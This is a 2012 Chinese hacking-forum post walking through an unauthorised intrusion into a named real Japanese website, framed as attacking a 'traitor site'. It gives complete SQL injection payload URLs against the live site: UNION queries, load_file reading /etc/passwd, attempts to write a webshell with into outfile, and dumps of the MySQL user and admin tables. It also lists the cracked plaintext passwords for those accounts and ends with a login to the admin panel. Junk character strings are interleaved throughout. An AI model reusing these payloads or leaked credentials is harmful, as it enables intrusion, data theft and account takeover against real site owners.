中国网络渗透测试联盟
标题:
原创 检测汉奸站全过程
[打印本页]
作者:
xiancda
时间:
2012-9-17 16:22
标题:
原创 检测汉奸站全过程
补:
www.zuaa.jp
测试
: K) Z" e1 J, E3 ]& F; w
/ N+ ^& |+ B1 x
0x01. 检测
www.zuaa.jp
收集数据
6 D: J6 C9 q5 i$ n, X
[attach]73[/attach]
3 s% C6 I& o1 u% T1 k
8 n/ f& h# z# t
whatweb
+ |2 x% S0 x5 }' e3 ^5 n
[attach]74[/attach]
: L) F; \. B8 f/ n% `
/ k [; f9 }# |/ G& k$ D3 t, X' a
利用NMAP扫描
; Q( d7 i7 e _0 a5 y x
[attach]75[/attach]
' ?: x# F4 C% J% }8 x% Z8 T
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
- _, k1 I2 W4 I* v5 u
0x02.找注入点
3 K, v; y( l6 n" @: V/ J& Y7 X
找注入点:
http://www.zuaa.jp/php/newsdetail.php?topic_id=390
4 u% m7 `4 @! D
[attach]76[/attach]
, s8 d/ y5 O- z/ B: e6 k0 ~
) X. ?! B7 g7 |8 t* t8 @3 ?7 C
0x03.order by
7 a/ c8 ~0 a; J! c( b
http://www.zuaa.jp/php/newsdetail.php?topic_id=390
order by 1
3 K* V( Y8 a; x8 c* {& S; D
[attach]77[/attach]
8 S& h5 B2 n$ d$ L/ P- `3 |: q
order by 28报错,order by 27正常
# \7 u7 [) ~ i( ?# B9 |
) x, q6 g8 F4 V D9 z8 ~. _# _
0x04. union手动查询
7 O R1 u1 c$ p$ ^2 J) P
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
$ v. H* Q; _6 X$ C( c) i# `; K
添加到 27 时正常显示
/ C5 M0 I W! T! l; h7 d! Q
[attach]78[/attach]
. N2 w7 I! @$ f! O- a5 t
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
6 E6 e* a* p: R l4 E7 c
. a( V) |/ C% Q$ C9 {
0x05. info:
, z1 K2 S; {' L% E( v0 s& v
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
: S' }# k) G, n2 x
[attach]79[/attach]
# f# w: W, `( y5 O p- I
user: root@localhost
* I! c1 p, J0 ~
database: openpne
4 e% Z+ f- K( q" x, w+ W
version: 4.1.22
+ F# o$ ~. ]) [
os: portbld-freebsd5.4
. t; v6 [' B; n
/ V5 q0 d, K8 c! s8 z
0x06. root用户
0 n+ b; Q( q5 w( g7 y Q
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
3 E c) y v) K3 O1 o
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
! f1 Z$ x, r0 l/ C1 p! J. H
[attach]80[/attach]
/ F6 Q2 ]3 t/ r8 F. X, y4 x
通过工具转换
8 M- B% E" t# L" V) Z* b0 H3 u
[attach]81[/attach]
. U: a& r& W# v" F: ]* \* T" R1 v. o, [
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
& N- V5 v8 g( ^2 u/ j$ O- X7 j
$ C0 r" m; K2 X% Y6 I2 a# B
0x07. 利用 into outfile
, N4 G3 j4 k& @3 Q
全部都失败
1 k( }* |0 p# A
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
! o* Y% C. w9 k) U% z v' D
7 U& Z9 }7 k$ d- c
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
+ E: K# I+ C7 ]( l5 [
1 e# z4 S( `3 w1 R+ H. H1 g( @
页面显示“MDB2 Error:syntax error”
2 l7 w; ]9 |# H$ ? V
. s9 k; o8 ]& C( _5 d! d
0x08. 利用 mysql 4.1
& ]; S) D$ I9 V# q
猜常规表名,字段未果 工具 sqlmap
- B/ d0 T9 @& G% Z0 z; k) `
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
6 v7 l0 W% y4 P1 `% N0 m
$ ^, X% ^' J5 W& e8 | d
[attach]82[/attach]
- B! s* C7 X( S3 x4 T/ _
6 x8 Y# P" R$ s7 o2 d$ M1 g5 ?
0x09. 查找后台
5 y8 h/ M3 `) x2 H+ G
利用 现有的各种 后台工具尝试都不行
6 p! _2 S" P) [- b4 l" E
4 s% {+ z- r; m: K% c3 y
0x10. MySL外联方法
' ]: Y g. B: U% R
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连
www.zuaa.jp
不行
( s# }0 V6 l3 R: w7 D$ }- I2 ~
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
& j! U( p, w* j+ @/ J+ u) Q3 ~
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
5 @$ w: w! b- r" f) t0 h
[attach]83[/attach]
2 P. T* O0 M# x+ Z
这个可以在
www.cmd5.com
解密
2 x6 K0 X& c# o$ i3 s1 P9 ]9 X
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
6 x' e4 O: q [0 h; _
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
/ L b& W1 I; \
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
! W0 \$ O/ t$ n1 B& [8 p% K
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
T! V% C) [+ p/ @. U
工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知
! A0 I) m8 r0 F: M; a
[attach]84[/attach]
& s5 ~0 k- U0 E/ _0 n
$ u D- n3 g! I% d7 N6 E
0x11. 网站突破
! d8 `) J( H$ y+ f+ l; b# s ~
发现网站的源程序 openpne, google 下载 openpne 源码
9 U3 s6 ^& f6 I r4 G
[attach]85[/attach]
7 m) W% A X1 |* ^3 W
% @ @1 r t# x) }
0x12. 默认信息利用
: z* P9 J: v# e+ V+ |4 o6 w3 n
http://sns.zuaa.jp/?m=admin&a=page_login
; f1 d5 E( U; Z9 w
[attach]86[/attach]
9 O$ ^7 S4 ~$ }0 F7 o
表名 (c_admin_user) ,字段名(username,password)
S K( f$ y. E* J) J
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
. B% n" N o/ F- I' i# @# r& c
[attach]87[/attach]
! p; y' @ L2 O* q! j3 }7 [
解密
! c8 o1 g X" v5 `% W* P2 T& U6 E7 u; q
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda, zuaa2009
: p1 N" [& x6 X/ i; D
zuaajp:c0923ec5857796a393da99905008c176, zju1897
: i [! j/ q4 r
I! c3 [' ~# k5 \* u7 }8 ?4 t0 K2 K
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
6 S5 G% Q( V% C9 B
4 U1 N" N( G( z* X6 Y( X
0x13. 登录后台
/ H+ g& N" b. ~: f
[attach]88[/attach]
N) K& }$ `8 n. h# D5 t
5 d" Q" ?8 n2 q/ j2 F" ~7 f
l5 h. m- \- \* R9 X
0x14. 小结
( k4 C3 D. A; J; U/ @
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
5 ?# G- M' a! F( |! ]1 \( J4 z
感谢群 ----
渗透 -酷帅王子
提供注入点 提供注入点
: P. I* j+ }6 ]) Q, }$ _) T" r, \
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------
By DarkRain
! K' C. y# n/ Y3 x: B
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
4 P8 o5 }! I$ G$ [
8 P1 S& ]$ I5 G( x9 r" A B
最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
; l6 L0 g6 X# H. R
作者:
荒村狂客
时间:
2012-9-19 08:27
哪个牛人 费的这劲 入侵的
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2